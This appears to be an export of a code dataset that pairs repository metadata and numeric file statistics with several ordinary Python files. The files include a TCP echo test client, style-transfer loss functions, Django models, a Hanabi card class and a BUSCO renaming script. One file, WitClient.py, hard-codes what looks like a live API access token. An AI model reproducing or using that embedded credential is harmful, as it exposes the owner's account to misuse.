| 18.45 | 47 | 0.734417 | 105 | 738 | 5.028571 | 0.371429 | 0.145833 | 0.060606 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023511 | 0.135501 | 738 | 39 | 48 | 18.923077 | 0.804075 | 0.059621 | 0 | 0.142857 | 0 | 0 | 0.141823 | 0 | 0 | 0 | 0.008683 | 0 | 0 | 1 | 0.035714 | true | 0 | 0.285714 | 0 | 0.321429 | 0.214286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22b61a63d3fab6ac5a4af3febf6a8b869aa2fb13 | 926 | py | Python | tests/tools/test-tcp4-client.py | jimmy-huang/zephyr.js | cef5c0dffaacf7d5aa3f8265626f68a1e2b32eb5 | [
"Apache-2.0"
] | null | null | null | tests/tools/test-tcp4-client.py | jimmy-huang/zephyr.js | cef5c0dffaacf7d5aa3f8265626f68a1e2b32eb5 | [
"Apache-2.0"
] | null | null | null | tests/tools/test-tcp4-client.py | jimmy-huang/zephyr.js | cef5c0dffaacf7d5aa3f8265626f68a1e2b32eb5 | [
"Apache-2.0"
] | null | null | null | # !usr/bin/python
# coding:utf-8
import time
import socket
def main():
print "Socket client creat successful"
host = "192.0.2.1"
port = 9876
bufSize = 1024
addr = (host, port)
Timeout = 300
mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mySocket.settimeout(Timeout)
mySocket.connect(addr)
while 1:
try :
Data = mySocket.recv(bufSize)
Data = Data.strip()
print "Got data: ", Data
time.sleep(2)
if Data == "close":
mySocket.close()
print "close socket"
break
else:
mySocket.sendall(Data)
print "Send data: ", Data
except KeyboardInterrupt :
print "exit client"
break
except :
print "time out"
continue
if __name__ == "__main__" :
main()
| 20.577778 | 64 | 0.512959 | 95 | 926 | 4.894737 | 0.557895 | 0.051613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035651 | 0.394168 | 926 | 44 | 65 | 21.045455 | 0.793226 | 0.030238 | 0 | 0.060606 | 0 | 0 | 0.116201 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.060606 | null | null | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22b976d4af390f9c20bc3dedbfcb6376fdbf0308 | 5,277 | py | Python | hw2/deeplearning/style_transfer.py | axelbr/berkeley-cs182-deep-neural-networks | 2bde27d9d5361d48dce7539d00b136209c1cfaa1 | [
"MIT"
] | null | null | null | hw2/deeplearning/style_transfer.py | axelbr/berkeley-cs182-deep-neural-networks | 2bde27d9d5361d48dce7539d00b136209c1cfaa1 | [
"MIT"
] | null | null | null | hw2/deeplearning/style_transfer.py | axelbr/berkeley-cs182-deep-neural-networks | 2bde27d9d5361d48dce7539d00b136209c1cfaa1 | [
"MIT"
] | null | null | null | import numpy as np
import torch
import torch.nn.functional as F
def content_loss(content_weight, content_current, content_target):
"""
Compute the content loss for style transfer.
Inputs:
- content_weight: Scalar giving the weighting for the content loss.
- content_current: features of the current image; this is a PyTorch Tensor of shape
(1, C_l, H_l, W_l).
- content_target: features of the content image, Tensor with shape (1, C_l, H_l, W_l).
Returns:
- scalar content loss
"""
##############################################################################
# YOUR CODE HERE #
##############################################################################
_, C, H, W = content_current.shape
current_features = content_current.view(C, H*W)
target_features = content_target.view(C, H*W)
loss = content_weight * torch.sum(torch.square(current_features - target_features))
return loss
##############################################################################
# END OF YOUR CODE #
##############################################################################
def gram_matrix(features, normalize=True):
"""
Compute the Gram matrix from features.
Inputs:
- features: PyTorch Variable of shape (N, C, H, W) giving features for
a batch of N images.
- normalize: optional, whether to normalize the Gram matrix
If True, divide the Gram matrix by the number of neurons (H * W * C)
Returns:
- gram: PyTorch Variable of shape (N, C, C) giving the
(optionally normalized) Gram matrices for the N input images.
"""
##############################################################################
# YOUR CODE HERE #
##############################################################################
C, H, W = features.shape[-3], features.shape[-2], features.shape[-1]
reshaped = features.view(-1, C, H*W)
G = reshaped @ reshaped.transpose(dim0=1, dim1=2)
if normalize:
G = G / (H*W*C)
return G
##############################################################################
# END OF YOUR CODE #
##############################################################################
def style_loss(feats, style_layers, style_targets, style_weights):
"""
Computes the style loss at a set of layers.
Inputs:
- feats: list of the features at every layer of the current image, as produced by
the extract_features function.
- style_layers: List of layer indices into feats giving the layers to include in the
style loss.
- style_targets: List of the same length as style_layers, where style_targets[i] is
a PyTorch Variable giving the Gram matrix the source style image computed at
layer style_layers[i].
- style_weights: List of the same length as style_layers, where style_weights[i]
is a scalar giving the weight for the style loss at layer style_layers[i].
Returns:
- style_loss: A PyTorch Variable holding a scalar giving the style loss.
"""
# Hint: you can do this with one for loop over the style layers, and should
# not be very much code (~5 lines). You will need to use your gram_matrix function.
##############################################################################
# YOUR CODE HERE #
##############################################################################
loss = 0
for i, l in enumerate(style_layers):
A, G = style_targets[i], gram_matrix(feats[l])
loss += style_weights[i] * torch.sum(torch.square(G - A))
return loss
##############################################################################
# END OF YOUR CODE #
##############################################################################
def tv_loss(img, tv_weight):
"""
Compute total variation loss.
Inputs:
- img: PyTorch Variable of shape (1, 3, H, W) holding an input image.
- tv_weight: Scalar giving the weight w_t to use for the TV loss.
Returns:
- loss: PyTorch Variable holding a scalar giving the total variation loss
for img weighted by tv_weight.
"""
# Your implementation should be vectorized and not require any loops!
##############################################################################
# YOUR CODE HERE #
##############################################################################
tv = torch.square(img[..., 1:, :-1] - img[..., :-1, :-1]) + torch.square(img[..., :-1, 1:] - img[..., :-1, :-1])
return tv_weight * torch.sum(tv)
##############################################################################
# END OF YOUR CODE #
##############################################################################
| 45.886957 | 116 | 0.437938 | 532 | 5,277 | 4.25188 | 0.246241 | 0.007958 | 0.007958 | 0.022989 | 0.181256 | 0.157383 | 0.1229 | 0.066313 | 0.037135 | 0.037135 | 0 | 0.005672 | 0.264923 | 5,277 | 114 | 117 | 46.289474 | 0.577468 | 0.481713 | 0 | 0.08 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035088 | 0 | 1 | 0.16 | false | 0 | 0.12 | 0 | 0.44 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22c0a198d3ffbdb90c8a504d310e057f35103de5 | 2,740 | py | Python | site_settings/models.py | shervinbdndev/Django-Shop | baa4e7b91fbdd01ee591049c12cd9fbfaa434379 | [
"MIT"
] | 13 | 2022-02-25T05:04:58.000Z | 2022-03-15T10:55:24.000Z | site_settings/models.py | iTsSobhan/Django-Shop | 9eb6a08c6e93e5401d6bc2eeb30f2ef35adec730 | [
"MIT"
] | null | null | null | site_settings/models.py | iTsSobhan/Django-Shop | 9eb6a08c6e93e5401d6bc2eeb30f2ef35adec730 | [
"MIT"
] | 1 | 2022-03-03T09:21:49.000Z | 2022-03-03T09:21:49.000Z | from django.db import models
class SiteSettings(models.Model):
site_name = models.CharField(max_length=200 , verbose_name='Site Name')
site_url = models.CharField(max_length=200 , verbose_name='Site URL')
site_address = models.CharField(max_length=300 , verbose_name='Site Address')
site_phone = models.CharField(max_length=100 , null=True , blank=True , verbose_name='Site Phone')
site_fax = models.CharField(max_length=200 , null=True , blank=True , verbose_name='Site Fax')
site_email = models.EmailField(max_length=200 , null=True , blank=True , verbose_name='Site Email')
about_us_text = models.TextField(verbose_name='About Us Text')
site_copy_right = models.TextField(verbose_name='Copyright Text')
site_logo = models.ImageField(upload_to='images/site-setting/' , verbose_name='Site Logo')
is_main_setting = models.BooleanField(verbose_name='Site Main Settings')
def __str__(self) -> str:
super(SiteSettings , self).__str__()
return self.site_name
class Meta:
verbose_name = 'Site Setting'
verbose_name_plural = 'Site Settings'
class FooterLinkBox(models.Model):
title = models.CharField(max_length=200 , verbose_name='Title')
def __str__(self) -> str:
super(FooterLinkBox , self).__str__()
return self.title
class Meta:
verbose_name = 'Footer Link Setting'
verbose_name_plural = 'Footer Link Settings'
class FooterLink(models.Model):
title = models.CharField(max_length=200 , verbose_name='Title')
url = models.URLField(max_length=500 , verbose_name='Links')
footer_link_box = models.ForeignKey(to=FooterLinkBox , verbose_name='Category' , on_delete=models.CASCADE)
def __str__(self) -> str:
super(FooterLink , self).__str__()
return self.title
class Meta:
verbose_name = 'Footer Link'
verbose_name_plural = 'Footer Links'
class Slider(models.Model):
title = models.CharField(max_length=200 , verbose_name='Title')
description = models.TextField(verbose_name='Slider Description')
url_title = models.CharField(max_length=200 , verbose_name='URL Title')
url = models.URLField(max_length=200 , verbose_name='URL Address')
image = models.ImageField(upload_to='images/sliders' , verbose_name='Slider Image')
is_active = models.BooleanField(default=False , verbose_name='Active / Inactive')
def __str__(self) -> str:
super(Slider , self).__str__()
return self.title
class Meta:
verbose_name = 'Slider'
verbose_name_plural = 'Sliders' | 36.052632 | 110 | 0.670073 | 329 | 2,740 | 5.285714 | 0.218845 | 0.177113 | 0.093157 | 0.124209 | 0.456584 | 0.372053 | 0.327775 | 0.309373 | 0.236343 | 0.212191 | 0 | 0.016941 | 0.224453 | 2,740 | 76 | 111 | 36.052632 | 0.801412 | 0 | 0 | 0.285714 | 0 | 0 | 0.124042 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081633 | false | 0 | 0.020408 | 0 | 0.755102 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
22c745e9fe90945bd78c2b0b4951b89a65ce5057 | 3,482 | py | Python | py_hanabi/card.py | krinj/hanabi-simulator | b77b04aa09bab8bd8d7b784e04bf8b9d5d76d1a6 | [
"MIT"
] | 1 | 2018-09-28T00:47:52.000Z | 2018-09-28T00:47:52.000Z | py_hanabi/card.py | krinj/hanabi-simulator | b77b04aa09bab8bd8d7b784e04bf8b9d5d76d1a6 | [
"MIT"
] | null | null | null | py_hanabi/card.py | krinj/hanabi-simulator | b77b04aa09bab8bd8d7b784e04bf8b9d5d76d1a6 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
A card (duh).
"""
import random
import uuid
from enum import Enum
from typing import List
from py_hanabi.settings import CARD_DECK_DISTRIBUTION
__author__ = "Jakrin Juangbhanich"
__email__ = "juangbhanich.k@gmail.com"
class Color(Enum):
RED = 1
BLUE = 2
GREEN = 3
YELLOW = 4
WHITE = 5
class Card:
def __init__(self, number: int, color: Color):
self._number: int = number
self._color: Color = color
self._id: str = uuid.uuid4().hex
self._hint_number_counter: int = 0
self._hint_color_counter: int = 0
# self._index_hinted: List[int] = []
# self._lone_hinted: List[bool] = []
# According to hints, these are the ones we know it is NOT.
self.not_color: List[Color] = []
self.not_number: List[int] = []
def __repr__(self):
hint_str = ""
if self.hint_received_color:
hint_str += "C"
if self.hint_received_number:
hint_str += "N"
return f"[{self.color} {self.number} {hint_str}]"
def __eq__(self, other: 'Card'):
return self.color == other.color and self.number == other.number
def receive_hint_number(self, number: int):
if number == self.number:
self._hint_number_counter += 1
else:
self.not_number.append(number)
def receive_hint_color(self, color: Color):
if color == self.color:
self._hint_color_counter += 1
else:
self.not_color.append(color)
def remove_hint_number(self, number: int):
if number == self.number:
self._hint_number_counter -= 1
else:
self.not_number.pop()
def remove_hint_color(self, color: Color):
if color == self.color:
self._hint_color_counter -= 1
else:
self.not_color.pop()
@property
def label(self):
return f"{self.number} of {self.get_color_label(self.color)}"
@property
def id(self) -> str:
return self._id
@property
def key(self) -> tuple:
return self.get_key(self.color, self.number)
@staticmethod
def get_key(c: Color, n: int) -> tuple:
return c, n
@property
def number(self) -> int:
return self._number
@property
def color(self) -> Color:
return self._color
@property
def observed_color(self) -> Color:
return None if not self.hint_received_color else self._color
@property
def observed_number(self) -> int:
return None if not self.hint_received_number else self._number
@property
def hint_received_number(self) -> bool:
return self._hint_number_counter > 0
@property
def hint_received_color(self) -> bool:
return self._hint_color_counter > 0
@staticmethod
def generate_deck() -> List['Card']:
""" Generate the starting deck for the game. """
deck: List[Card] = []
for color in Color:
for i in CARD_DECK_DISTRIBUTION:
card = Card(i, color)
deck.append(card)
random.shuffle(deck)
return deck
@staticmethod
def get_color_label(color: Color) -> str:
color_labels = {
Color.BLUE: "Blue",
Color.RED: "Red",
Color.YELLOW: "Yellow",
Color.GREEN: "Green",
Color.WHITE: "White",
}
return color_labels[color]
| 24.871429 | 72 | 0.587881 | 435 | 3,482 | 4.471264 | 0.222989 | 0.064781 | 0.043188 | 0.043188 | 0.243702 | 0.192288 | 0.192288 | 0.160411 | 0.160411 | 0.160411 | 0 | 0.006203 | 0.305572 | 3,482 | 139 | 73 | 25.05036 | 0.79818 | 0.059161 | 0 | 0.2 | 0 | 0 | 0.050952 | 0.017802 | 0 | 0 | 0 | 0 | 0 | 1 | 0.19 | false | 0 | 0.05 | 0.11 | 0.45 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
22c78686c8b8a763f3206d86fcbc87e20d6ea1aa | 1,186 | py | Python | setup.py | d2gex/distpickymodel | 7acd4ffafbe592d6336d91d6e7411cd45357e41c | [
"MIT"
] | null | null | null | setup.py | d2gex/distpickymodel | 7acd4ffafbe592d6336d91d6e7411cd45357e41c | [
"MIT"
] | null | null | null | setup.py | d2gex/distpickymodel | 7acd4ffafbe592d6336d91d6e7411cd45357e41c | [
"MIT"
] | null | null | null | import setuptools
import distpickymodel
def get_long_desc():
with open("README.rst", "r") as fh:
return fh.read()
setuptools.setup(
name="distpickymodel",
version=distpickymodel.__version__,
author="Dan G",
author_email="daniel.garcia@d2garcia.com",
description="A shared Mongoengine-based model library",
long_description=get_long_desc(),
url="https://github.com/d2gex/distpickymodel",
# Exclude 'tests' and 'docs'
packages=['distpickymodel'],
python_requires='>=3.6',
install_requires=['pymongo>=3.7.2', 'mongoengine>=0.17.0', 'six'],
tests_require=['pytest>=4.4.0', 'PyYAML>=5.1'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
| 32.944444 | 71 | 0.636594 | 126 | 1,186 | 5.888889 | 0.690476 | 0.076819 | 0.101078 | 0.070081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02246 | 0.211636 | 1,186 | 35 | 72 | 33.885714 | 0.771123 | 0.021922 | 0 | 0 | 0 | 0 | 0.522453 | 0.022453 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | true | 0 | 0.066667 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22cc300c5aa21f713c2ef3f3b60722cc7d238f97 | 1,163 | py | Python | rdl/data_sources/DataSourceFactory.py | pageuppeople-opensource/relational-data-loader | 0bac7036d65636d06eacca4e68e09d6e1c506ea4 | [
"MIT"
] | 2 | 2019-03-11T12:45:23.000Z | 2019-04-05T05:22:43.000Z | rdl/data_sources/DataSourceFactory.py | pageuppeople-opensource/relational-data-loader | 0bac7036d65636d06eacca4e68e09d6e1c506ea4 | [
"MIT"
] | 5 | 2019-02-08T03:23:25.000Z | 2019-04-11T01:29:45.000Z | rdl/data_sources/DataSourceFactory.py | PageUpPeopleOrg/relational-data-loader | 0bac7036d65636d06eacca4e68e09d6e1c506ea4 | [
"MIT"
] | 1 | 2019-03-04T04:08:49.000Z | 2019-03-04T04:08:49.000Z | import logging
from rdl.data_sources.MsSqlDataSource import MsSqlDataSource
from rdl.data_sources.AWSLambdaDataSource import AWSLambdaDataSource
class DataSourceFactory(object):
def __init__(self, logger=None):
self.logger = logger or logging.getLogger(__name__)
self.sources = [MsSqlDataSource, AWSLambdaDataSource]
def create_source(self, connection_string):
for source in self.sources:
if source.can_handle_connection_string(connection_string):
self.logger.info(
f"Found handler '{source}' for given connection string."
)
return source(connection_string)
raise RuntimeError(
"There are no data sources that can handle this connection string"
)
def is_prefix_supported(self, connection_string):
for source in self.sources:
if source.can_handle_connection_string(connection_string):
return True
return False
def get_supported_source_prefixes(self):
return list(
map(lambda source: source.get_connection_string_prefix(), self.sources)
)
| 35.242424 | 83 | 0.674979 | 124 | 1,163 | 6.08871 | 0.41129 | 0.211921 | 0.029139 | 0.047682 | 0.24106 | 0.24106 | 0.24106 | 0.24106 | 0.24106 | 0.24106 | 0 | 0 | 0.263113 | 1,163 | 32 | 84 | 36.34375 | 0.88098 | 0 | 0 | 0.153846 | 0 | 0 | 0.100602 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.115385 | 0.038462 | 0.461538 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22cd87f92115b6affd305877641e7e519dbd0eb4 | 476 | py | Python | server/WitClient.py | owo/jitalk | 2db2782282a2302b4cf6049030822734a6856982 | [
"MIT"
] | 1 | 2020-06-22T14:28:41.000Z | 2020-06-22T14:28:41.000Z | server/WitClient.py | owo/jitalk | 2db2782282a2302b4cf6049030822734a6856982 | [
"MIT"
] | null | null | null | server/WitClient.py | owo/jitalk | 2db2782282a2302b4cf6049030822734a6856982 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import wit
import json
class WitClient(object):
"""docstring for WitClient"""
_access_token = 'NBPOVLY7T6W3KOUEML2GXOWODH3LPWPD'
def __init__(self):
wit.init()
def text_query(self, text):
res = json.loads(wit.text_query(text, WitClient._access_token))
return res["outcomes"]
def close_connection(self):
wit.close()
if __name__ == "__main__":
print "You ran the Wit client, nothing will happen. Exiting..." | 20.695652 | 65 | 0.707983 | 62 | 476 | 5.129032 | 0.66129 | 0.09434 | 0.125786 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014851 | 0.151261 | 476 | 23 | 66 | 20.695652 | 0.772277 | 0.088235 | 0 | 0 | 0 | 0 | 0.254951 | 0.079208 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22cf943746c3603f630cb274d2c1d26e36acc1fd | 3,472 | py | Python | python_scripts/BUSCO_phylogenetics/rename_all_fa_seq.py | peterthorpe5/Methods_M.cerasi_R.padi_genome_assembly | c6cb771afaf40f5def47e33ff11cd8867ec528e0 | [
"MIT"
] | 4 | 2019-04-01T02:08:21.000Z | 2022-02-04T08:37:47.000Z | python_scripts/BUSCO_phylogenetics/rename_all_fa_seq.py | peterthorpe5/Methods_M.cerasi_R.padi_genome_assembly | c6cb771afaf40f5def47e33ff11cd8867ec528e0 | [
"MIT"
] | 1 | 2018-09-30T00:29:43.000Z | 2018-10-01T07:51:16.000Z | python_scripts/BUSCO_phylogenetics/rename_all_fa_seq.py | peterthorpe5/Methods_M.cerasi_R.padi_genome_assembly | c6cb771afaf40f5def47e33ff11cd8867ec528e0 | [
"MIT"
] | 1 | 2019-12-05T09:04:38.000Z | 2019-12-05T09:04:38.000Z | #!/usr/bin/env python
# author: Peter Thorpe September 2015. The James Hutton Insitute, Dundee, UK.
# title rename single copy busco genes
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio import SeqIO
import os
from sys import stdin,argv
import sys
from optparse import OptionParser
########################################################################
# functions
def parse_busco_file(busco):
"""this is a function to open busco full ouput
and get a list of duplicated genes. This list is required
so we can ignore these genes later. Takes file,
return list"""
duplicated_list = []
with open(busco) as handle:
for line in handle:
if not line.strip():
continue # if the last line is blank
if line.startswith("#"):
continue
if not line:
print ("your file is empty")
return False
line_info = line.rstrip().split("\t")
# first element
Busco_name = line_info[0]
# second element
status = line_info[1]
if status == "Duplicated" or status == "Fragmented":
duplicated_list.append(Busco_name)
return duplicated_list
def reformat_as_fasta(filename,prefix,outfile):
"this function re-write a file as a fasta file"
f= open(outfile, 'w')
fas = open(filename, "r")
for line in fas:
if not line.strip():
continue # if the last line is blank
if line.startswith("#"):
continue
if not line:
return False
if not line.startswith(">"):
seq = line
title = ">" + prefix + "_" + filename.replace("BUSCOa", "").split(".fas")[0]
data = "%s\n%s\n" %(title, seq)
f.write(data)
f.close()
if "-v" in sys.argv or "--version" in sys.argv:
print "v0.0.1"
sys.exit(0)
usage = """Use as follows:
converts
$ python renaem....py -p Mce -b full_table_BUSCO_output
script to walk through all files in a folder and rename the seq id
to start with Prefix.
Used for Busco output.
give it the busco full ouput table. The script will only return
complete single copy gene. Duplicate gene will be ignored.
"""
parser = OptionParser(usage=usage)
parser.add_option("-p", "--prefix", dest="prefix",
default=None,
help="Output filename",
metavar="FILE")
parser.add_option("-b", "--busco", dest="busco",
default=None,
help="full_table_*_BUSCO output from BUSCO",
metavar="FILE")
(options, args) = parser.parse_args()
prefix = options.prefix
busco = options.busco
# Run as script
if __name__ == '__main__':
#call function to get a list of dupicated gene.
#these genes will be ignored
duplicated_list = parse_busco_file(busco)
#iterate through the dir
for filename in os.listdir("."):
count = 1
if not filename.endswith(".fas"):
continue
#filter out the ones we dont want
if filename.split(".fa")[0] in duplicated_list:
continue
out_file = "../"+prefix+filename
out_file = out_file.replace("BUSCOa", "")
#out_file = "../"+filename
try:
#print filename
reformat_as_fasta(filename, prefix, out_file)
except:
ValueError
continue
| 26.707692 | 84 | 0.579781 | 436 | 3,472 | 4.522936 | 0.385321 | 0.015213 | 0.022819 | 0.01927 | 0.105477 | 0.076065 | 0.076065 | 0.076065 | 0.076065 | 0.076065 | 0 | 0.005363 | 0.301843 | 3,472 | 129 | 85 | 26.914729 | 0.808168 | 0.116935 | 0 | 0.2375 | 0 | 0 | 0.201359 | 0.008226 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0875 | null | null | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22d2e5e3c594615ca7c099c59610e2d90de239db | 403 | py | Python | pages/migrations/0004_auto_20181102_0944.py | yogeshprasad/spa-development | 1bee9ca64da5815e1c9a2f7af43b44b59ee2ca7b | [
"Apache-2.0"
] | null | null | null | pages/migrations/0004_auto_20181102_0944.py | yogeshprasad/spa-development | 1bee9ca64da5815e1c9a2f7af43b44b59ee2ca7b | [
"Apache-2.0"
] | 7 | 2020-06-05T19:11:22.000Z | 2022-03-11T23:30:57.000Z | pages/migrations/0004_auto_20181102_0944.py | yogeshprasad/spa-development | 1bee9ca64da5815e1c9a2f7af43b44b59ee2ca7b | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.0.6 on 2018-11-02 09:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pages', '0003_coachingcourse'),
]
operations = [
migrations.AlterField(
model_name='coachingcourse',
name='username',
field=models.CharField(default='', max_length=100),
),
]
| 21.210526 | 63 | 0.602978 | 41 | 403 | 5.853659 | 0.829268 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075601 | 0.277916 | 403 | 18 | 64 | 22.388889 | 0.749141 | 0.111663 | 0 | 0 | 1 | 0 | 0.129213 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22d31dc3511cd477901e03ecc8f042e8c0f688bf | 1,119 | py | Python | imageclassification/src/sample/splitters/_StratifiedSplitter.py | waikato-datamining/keras-imaging | f044f883242895c18cfdb31a827bc32bdb0405ed | [
"MIT"
] | null | null | null | imageclassification/src/sample/splitters/_StratifiedSplitter.py | waikato-datamining/keras-imaging | f044f883242895c18cfdb31a827bc32bdb0405ed | [
"MIT"
] | null | null | null | imageclassification/src/sample/splitters/_StratifiedSplitter.py | waikato-datamining/keras-imaging | f044f883242895c18cfdb31a827bc32bdb0405ed | [
"MIT"
] | 1 | 2020-04-16T15:29:28.000Z | 2020-04-16T15:29:28.000Z | from collections import OrderedDict
from random import Random
from typing import Set
from .._types import Dataset, Split, LabelIndices
from .._util import per_label
from ._RandomSplitter import RandomSplitter
from ._Splitter import Splitter
class StratifiedSplitter(Splitter):
"""
TODO
"""
def __init__(self, percentage: float, labels: LabelIndices, random: Random = Random()):
self._percentage = percentage
self._labels = labels
self._random = random
def __str__(self) -> str:
return f"strat-{self._percentage}"
def __call__(self, dataset: Dataset) -> Split:
subsets_per_label = per_label(dataset)
sub_splits = {
label: RandomSplitter(int(len(subsets_per_label[label]) * self._percentage), self._random)(subsets_per_label[label])
for label in self._labels.keys()
}
result = OrderedDict(), OrderedDict()
for filename, label in dataset.items():
result_index = 0 if filename in sub_splits[label][0] else 1
result[result_index][filename] = label
return result
| 28.692308 | 128 | 0.671135 | 127 | 1,119 | 5.637795 | 0.362205 | 0.055866 | 0.062849 | 0.055866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003521 | 0.238606 | 1,119 | 38 | 129 | 29.447368 | 0.836854 | 0.003575 | 0 | 0 | 0 | 0 | 0.021838 | 0.021838 | 0 | 0 | 0 | 0.026316 | 0 | 1 | 0.12 | false | 0 | 0.28 | 0.04 | 0.52 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22d37205c7c002b3538af8a7bcaeddcf556d57d9 | 315 | py | Python | revenuecat_python/enums.py | YuraHavrylko/revenuecat_python | a25b234933b6e80e1ff09b6a82d73a0e3df91caa | [
"MIT"
] | 1 | 2020-12-11T09:31:02.000Z | 2020-12-11T09:31:02.000Z | revenuecat_python/enums.py | YuraHavrylko/revenuecat_python | a25b234933b6e80e1ff09b6a82d73a0e3df91caa | [
"MIT"
] | null | null | null | revenuecat_python/enums.py | YuraHavrylko/revenuecat_python | a25b234933b6e80e1ff09b6a82d73a0e3df91caa | [
"MIT"
] | null | null | null | from enum import Enum
class SubscriptionPlatform(Enum):
ios = 'ios'
android = 'android'
macos = 'macos'
uikitformac = 'uikitformac'
stripe = 'stripe'
class AttributionNetworkCode(Enum):
apple_search_ads = 0
adjust = 1
apps_flyer = 2
branch = 3
tenjin = 4
facebook = 5 | 17.5 | 35 | 0.634921 | 35 | 315 | 5.628571 | 0.742857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026432 | 0.279365 | 315 | 18 | 36 | 17.5 | 0.84141 | 0 | 0 | 0 | 0 | 0 | 0.101266 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
